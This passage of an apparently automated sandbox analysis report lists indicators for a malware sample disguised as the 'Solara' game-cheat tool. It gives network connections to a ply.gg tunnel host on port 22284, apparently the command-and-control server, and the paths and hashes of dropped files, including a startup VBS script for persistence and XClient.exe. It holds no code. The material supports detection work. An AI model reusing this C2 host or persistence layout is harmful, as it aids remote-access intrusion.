| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:55976 | tcp | |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | anyone-blogging.gl.at.ply.gg | udp |
| US | 147.185.221.20:22284 | anyone-blogging.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 20.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 147.185.221.20:22284 | anyone-blogging.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
Files
memory/5036-0-0x000000007529E000-0x000000007529F000-memory.dmp
memory/5036-1-0x00000000007B0000-0x00000000007BA000-memory.dmp
memory/5036-2-0x0000000075290000-0x0000000075A40000-memory.dmp
memory/5036-7-0x0000000005C70000-0x0000000005C7A000-memory.dmp
C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat
| MD5 | 49f8779d69c5572c5534a2b83f90334b |
| SHA1 | edbeaff47d9b2fe4244b9710e014924189c086b6 |
| SHA256 | e3120bc12c0d1c82b3d719e8d095fcee2bba9571d2ad85e9e2b1b2dae921cc49 |
| SHA512 | a34cb31c8bdccced3167a1df44e6635cf66ddc544246115639727611aab578e576e98297be42d9496971da4b35db5f8359b8b06499009d885269e3ad3e5fd6bc |
memory/5020-9-0x00000000031C0000-0x00000000031F6000-memory.dmp
memory/5020-10-0x0000000075290000-0x0000000075A40000-memory.dmp
memory/5020-12-0x0000000075290000-0x0000000075A40000-memory.dmp
memory/5020-13-0x0000000075290000-0x0000000075A40000-memory.dmp
memory/5020-11-0x0000000005A00000-0x0000000006028000-memory.dmp
memory/5036-15-0x00000000061C0000-0x00000000061D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lb11sopt.zze.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5020-97-0x0000000005850000-0x0000000005872000-memory.dmp
memory/5020-222-0x0000000005980000-0x00000000059E6000-memory.dmp
memory/5020-245-0x00000000060B0000-0x0000000006116000-memory.dmp
memory/5020-434-0x0000000006150000-0x00000000064A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\get-intrinsic\.nycrc
| MD5 | d0104f79f0b4f03bbcd3b287fa04cf8c |
| SHA1 | 54f9d7adf8943cb07f821435bb269eb4ba40ccc2 |
| SHA256 | 997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a |
| SHA512 | daf9b5445cfc02397f398adfa0258f2489b70699dfec6ca7e5b85afe5671fdcabe59edee332f718f5e5778feb1e301778dffe93bb28c1c0914f669659bad39c6 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\has-proto\.eslintrc
| MD5 | c28b0fe9be6e306cc2ad30fe00e3db10 |
| SHA1 | af79c81bd61c9a937fca18425dd84cdf8317c8b9 |
| SHA256 | 0694050195fc694c5846b0a2a66b437ac775da988f0a779c55fb892597f7f641 |
| SHA512 | e3eca17804522ffa4f41e836e76e397a310a20e8261a38115b67e8b644444153039d04198fb470f45be2997d2c7a72b15bd4771a02c741b3cbc072ea6ef432e9 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\hasown\.nycrc
| MD5 | c2ab942102236f987048d0d84d73d960 |
| SHA1 | 95462172699187ac02eaec6074024b26e6d71cff |
| SHA256 | 948366fea3b423a46366326d0bb2e54b08abd1cf0b243678ba6625740c40da5a |
| SHA512 | e36b20c16ceeb090750f3865efc8d7fd983ae4e8b41c30cc3865d2fd4925bf5902627e1f1ed46c0ff2453f076ef9de34be899ef57754b29cd158440071318479 |
memory/5020-991-0x0000000006600000-0x000000000661E000-memory.dmp
memory/5020-1044-0x00000000066B0000-0x00000000066FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\vary\LICENSE
| MD5 | 13babc4f212ce635d68da544339c962b |
| SHA1 | 4881ad2ec8eb2470a7049421047c6d076f48f1de |
| SHA256 | bd47ce7b88c7759630d1e2b9fcfa170a0f1fde522be09e13fb1581a79d090400 |
| SHA512 | 40e30174433408e0e2ed46d24373b12def47f545d9183b7bce28d4ddd8c8bb528075c7f20e118f37661db9f1bba358999d81a14425eb3e0a4a20865dfcb53182 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
| MD5 | d84e7f79f4f0d7074802d2d6e6f3579e |
| SHA1 | 494937256229ef022ff05855c3d410ac3e7df721 |
| SHA256 | dcfc2b4fa3185df415855ec54395d9c36612f68100d046d8c69659da01f7d227 |
| SHA512 | ed7b0ac098c8184b611b83158eaa86619001e74dba079d398b34ac694ce404ba133c2baf43051840132d6a3a089a375550072543b9fab2549d57320d13502260 |
memory/5036-1488-0x0000000075290000-0x0000000075A40000-memory.dmp
memory/1712-1489-0x00007FFC4FFF3000-0x00007FFC4FFF5000-memory.dmp
memory/1712-1490-0x0000022BAFD10000-0x0000022BAFD2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Wpf.Ui.dll
| MD5 | aead90ab96e2853f59be27c4ec1e4853 |
| SHA1 | 43cdedde26488d3209e17efff9a51e1f944eb35f |
| SHA256 | 46cfbe804b29c500ebc0b39372e64c4c8b4f7a8e9b220b5f26a9adf42fcb2aed |
| SHA512 | f5044f2ee63906287460b9adabfcf3c93c60b51c86549e33474c4d7f81c4f86cd03cd611df94de31804c53006977874b8deb67c4bf9ea1c2b70c459b3a44b38d |
memory/1712-1492-0x0000022BCB7B0000-0x0000022BCBCEC000-memory.dmp
memory/1712-1493-0x0000022BCB420000-0x0000022BCB4DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Newtonsoft.Json.dll
| MD5 | 195ffb7167db3219b217c4fd439eedd6 |
| SHA1 | 1e76e6099570ede620b76ed47cf8d03a936d49f8 |
| SHA256 | e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d |
| SHA512 | 56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac |
memory/1712-1495-0x0000022BCB4E0000-0x0000022BCB592000-memory.dmp
memory/5020-1496-0x0000000007C90000-0x000000000830A000-memory.dmp
memory/5020-1497-0x0000000006B70000-0x0000000006B8A000-memory.dmp
memory/1712-1498-0x0000022BCB200000-0x0000022BCB222000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Wpf.dll
| MD5 | 34ec990ed346ec6a4f14841b12280c20 |
| SHA1 | 6587164274a1ae7f47bdb9d71d066b83241576f0 |
| SHA256 | 1e987b22cd011e4396a0805c73539586b67df172df75e3dded16a77d31850409 |
| SHA512 | b565015ca4b11b79ecbc8127f1fd40c986948050f1caefdd371d34ed2136af0aabf100863dc6fd16d67e3751d44ee13835ea9bf981ac0238165749c4987d1ae0 |
memory/1712-1500-0x0000022BCB1D0000-0x0000022BCB1DE000-memory.dmp
memory/5020-1501-0x0000000006BA0000-0x0000000006BA8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Core.dll
| MD5 | 851fee9a41856b588847cf8272645f58 |
| SHA1 | ee185a1ff257c86eb19d30a191bf0695d5ac72a1 |
| SHA256 | 5e7faee6b8230ca3b97ce9542b914db3abbbd1cb14fd95a39497aaad4c1094ca |
| SHA512 | cf5c70984cf33e12cf57116da1f282a5bd6433c570831c185253d13463b0b9a0b9387d4d1bf4dddab3292a5d9ba96d66b6812e9d7ebc5eb35cb96eea2741348f |
memory/1712-1503-0x0000022BCB6E0000-0x0000022BCB75E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\WebView2Loader.dll
| MD5 | a0bd0d1a66e7c7f1d97aedecdafb933f |
| SHA1 | dd109ac34beb8289030e4ec0a026297b793f64a3 |
| SHA256 | 79d7e45f8631e8d2541d01bfb5a49a3a090be72b3d465389a2d684680fee2e36 |
| SHA512 | 2a50ae5c7234a44b29f82ebc2e3cfed37bf69294eb00b2dc8905c61259975b2f3a059c67aeab862f002752454d195f7191d9b82b056f6ef22d6e1b0bb3673d50 |
memory/5020-1506-0x0000000006C00000-0x0000000006C10000-memory.dmp
memory/5020-1507-0x0000000008810000-0x0000000008DB4000-memory.dmp
memory/4952-1518-0x0000000007560000-0x0000000007592000-memory.dmp
memory/4952-1519-0x00000000702E0000-0x000000007032C000-memory.dmp
memory/4952-1529-0x0000000007540000-0x000000000755E000-memory.dmp
memory/4952-1530-0x00000000075B0000-0x0000000007653000-memory.dmp
memory/4952-1531-0x0000000007760000-0x000000000776A000-memory.dmp
memory/4952-1532-0x0000000007990000-0x0000000007A26000-memory.dmp
memory/4952-1533-0x0000000007900000-0x0000000007911000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.dll
| MD5 | edeb33e769c055cd02824b26edeb5010 |
| SHA1 | 8fe0e6af65a2ac5af81350d5cf158466e515691c |
| SHA256 | f888baf11c6bad29b57fbd03be06d388d7838d1ee70949e7ab093628836639a7 |
| SHA512 | cae08dcbb4a61b81ed7d2554ac7c34a40a0f7c116e26429dd787052323fc73afcad8aaa52bada0059853e95505de4df5aad57ebdf929ad164a48e711551cbfe4 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\zlib1.dll
| MD5 | 75365924730b0b2c1a6ee9028ef07685 |
| SHA1 | a10687c37deb2ce5422140b541a64ac15534250f |
| SHA256 | 945e7f5d09938b7769a4e68f4ef01406e5af9f40db952cba05ddb3431dd1911b |
| SHA512 | c1e31c18903e657203ae847c9af601b1eb38efa95cb5fa7c1b75f84a2cba9023d08f1315c9bb2d59b53256dfdb3bac89930252138475491b21749471adc129a1 |
memory/1712-1542-0x0000022BCB250000-0x0000022BCB258000-memory.dmp
memory/1712-1543-0x0000000180000000-0x0000000180B15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\vcruntime140.dll
| MD5 | 7a2b8cfcd543f6e4ebca43162b67d610 |
| SHA1 | c1c45a326249bf0ccd2be2fbd412f1a62fb67024 |
| SHA256 | 7d7ca28235fba5603a7f40514a552ac7efaa67a5d5792bb06273916aa8565c5f |
| SHA512 | e38304fb9c5af855c1134f542adf72cde159fab64385533eafa5bb6e374f19b5a29c0cb5516fc5da5c0b5ac47c2f6420792e0ac8ddff11e749832a7b7f3eb5c8 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\libcurl.dll
| MD5 | e31f5136d91bad0fcbce053aac798a30 |
| SHA1 | ee785d2546aec4803bcae08cdebfd5d168c42337 |
| SHA256 | ee94e2201870536522047e6d7fe7b903a63cd2e13e20c8fffc86d0e95361e671 |
| SHA512 | a1543eb1d10d25efb44f9eaa0673c82bfac5173055d04c0f3be4792984635a7c774df57a8e289f840627754a4e595b855d299070d469e0f1e637c3f35274abe6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 21185e1f6fe1097934b6c5dfcbf92f5f |
| SHA1 | deab776d1c09400eff0caa6cc2e9547bdea01d33 |
| SHA256 | 0a5f5406bd097828385ec3cc91371dd54225af6bbdd694a34af4c7257ad9e16f |
| SHA512 | 82e1322506570e07878503500a413b49c4af3f291438e84721be3bb5cb480f11b6d0da6becea94b5e91fb31f03b10f10cc23be58eb55dce4838f36705600cd62 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 9751fcb3d8dc82d33d50eebe53abe314 |
| SHA1 | 7a680212700a5d9f3ca67c81e0e243834387c20c |
| SHA256 | ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7 |
| SHA512 | 54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709 |
C:\Users\Admin\AppData\Roaming\startup_str_846.vbs
| MD5 | 55cfb61121013050a5eee40ad7edb75f |
| SHA1 | 1ba998c58e5d08432299dc4a6c825cffc22d1247 |
| SHA256 | 0a8a77a2265f5dec9203b0f89a8815bf754743496a5c362404d4d79688536096 |
| SHA512 | 1282ae290b9d719e5e5fa6f6d767bdc8cc2e41728ff37910a39b594e78d17635082d6249470a3ba1e4a2cf8e2f6e7318a27b6d40547f9a5ab2d33133763523d9 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\bin\path.txt
| MD5 | 0e2184f1c7464b6617329fb18f107b4f |
| SHA1 | 6f22f98471e33c9db10d6f6f1728e98852e25b8f |
| SHA256 | dbf5f44e1b84a298dbbcad3c31a617d2f6cfa08eb5d16e05a5c28726c574d4eb |
| SHA512 | 8e745c0215d52e15702551f29efb882a5eba97b5f279ccc29293b1a9b1b8661bf71b548569f9a99fa35c35a15d1b6b288d3c381c1292418c36dc89e2fa0b3a37 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.WinForms.dll
| MD5 | 4cf94ffa50fd9bdc0bb93cceaede0629 |
| SHA1 | 3e30eca720f4c2a708ec53fd7f1ba9e778b4f95f |
| SHA256 | 50b2e46c99076f6fa9c33e0a98f0fe3a2809a7c647bb509066e58f4c7685d7e6 |
| SHA512 | dc400518ef2f68920d90f1ce66fbb8f4dde2294e0efeecd3d9329aa7a66e1ab53487b120e13e15f227ea51784f90208c72d7fbfa9330d9b71dd9a1a727d11f98 |
memory/1712-1557-0x0000022BCC160000-0x0000022BCC198000-memory.dmp
memory/1712-1558-0x0000022BCB790000-0x0000022BCB79E000-memory.dmp
memory/5020-1559-0x0000000075290000-0x0000000075A40000-memory.dmp
memory/1560-1565-0x0000000005AC0000-0x0000000005E14000-memory.dmp
memory/1560-1571-0x0000000006110000-0x000000000615C000-memory.dmp
memory/1560-1572-0x0000000007150000-0x0000000007164000-memory.dmp
memory/1560-1573-0x00000000074A0000-0x000000000753C000-memory.dmp
memory/1712-1574-0x00007FFC4FFF3000-0x00007FFC4FFF5000-memory.dmp
memory/620-1584-0x00000000717C0000-0x000000007180C000-memory.dmp
memory/620-1594-0x0000000007130000-0x00000000071D3000-memory.dmp
memory/620-1595-0x00000000074A0000-0x00000000074B1000-memory.dmp
memory/620-1596-0x00000000074D0000-0x00000000074DE000-memory.dmp
memory/620-1597-0x00000000074E0000-0x00000000074F4000-memory.dmp
memory/620-1598-0x0000000007520000-0x000000000753A000-memory.dmp
memory/620-1599-0x0000000007510000-0x0000000007518000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e347b64d6015ad4f1e2c6b423ac0f548 |
| SHA1 | 02b274e9ad91e18a7d145fd68adc53ff0144d56a |
| SHA256 | a893ea830e0fcd71dd285848d07e27e2746f11169fa56a824b8e08a0823ccc7e |
| SHA512 | 79b6896dfade3d2531877b82a91cc0c6f0fbe58b37ce78f3e8c74349d1cff16941b32dbf19ceceba6d9921d1c0ed77201ffed52f3d65098fadbe83e61d83fc2b |
memory/1668-1611-0x00000000717C0000-0x000000007180C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c63f754fa44da8f9e03165a87656416f |
| SHA1 | 08fbe34d0321f6af30f48a69c1855a7a84aa3d12 |
| SHA256 | 6f6497bb7c456e6070b7c88ede5316c5ba2e2c3a9ac168f229b21692199a6e05 |
| SHA512 | 37f7d7198999a5568e8e485dca19794ab1e8c3128090b20eb3e837e96b65d660c1e8b3abeba4e291044ae45dd451351fc6b9e176f6511167dbe1c1673db42031 |
memory/3252-1632-0x00000000717C0000-0x000000007180C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 003c24823fdf5e8c6aac4253f64b59e5 |
| SHA1 | 0f793dfedf50807a8b9ef5e17a9cd7e1448e7646 |
| SHA256 | 6bfcc8868071e41aba69288450349a0c84080d04886b5d5d8dd7797bf5bcb66e |
| SHA512 | b98127f883c9d65b19ce241686737c4532de118453a3a6a87a02b661a79d91fb9cae3200db3f5b4f292db4fc0788972cdb33de7e75becdc476f00dbe218d2249 |
memory/1080-1653-0x00000000717C0000-0x000000007180C000-memory.dmp
memory/1712-1664-0x0000000180000000-0x0000000180B15000-memory.dmp
memory/1560-1669-0x00000000081D0000-0x0000000008262000-memory.dmp
memory/1560-1670-0x00000000083E0000-0x00000000083EA000-memory.dmp
C:\Users\Admin\XClient.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/1560-1683-0x0000000005A40000-0x0000000005A4C000-memory.dmp